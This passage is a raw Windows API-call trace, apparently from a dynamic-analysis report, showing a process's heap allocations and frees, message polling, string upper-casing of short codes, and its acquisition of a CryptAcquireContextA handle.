dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0206.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0206.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0206.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0206.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0206.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0206.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.033] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0206.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0206.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0206.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0206.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466dd0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0206.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0206.035] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0206.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0206.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0206.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466dd0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0206.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0206.036] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0206.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0206.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3688 | out: hHeap=0x25c0000) returned 1 [0206.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0206.036] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2940) returned 1 [0206.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0206.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0206.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0206.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0206.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0206.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0206.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0206.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0206.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0206.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0206.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.039] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0206.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0206.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0206.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0206.040] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0206.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0206.040] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0206.040] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0206.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0206.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0206.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0206.040] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0206.040] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.040] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0206.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0206.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0206.041] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.041] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.041] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.041] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0206.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0206.041] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0206.041] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0206.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0206.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0206.041] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0206.041] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.041] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0206.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0206.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0206.042] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.042] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.042] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0206.042] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0206.042] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0206.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0206.042] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0206.042] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0206.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0206.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0206.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.043] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0206.043] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.043] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0206.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0206.043] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0206.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0206.043] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0206.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0206.043] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0206.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0206.044] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0206.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0206.044] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0206.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0206.044] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0206.044] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0206.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0206.044] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0206.044] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.044] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0206.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0206.044] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0206.045] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0206.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0206.045] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0206.045] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.046] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.046] RtlAllocateHeap 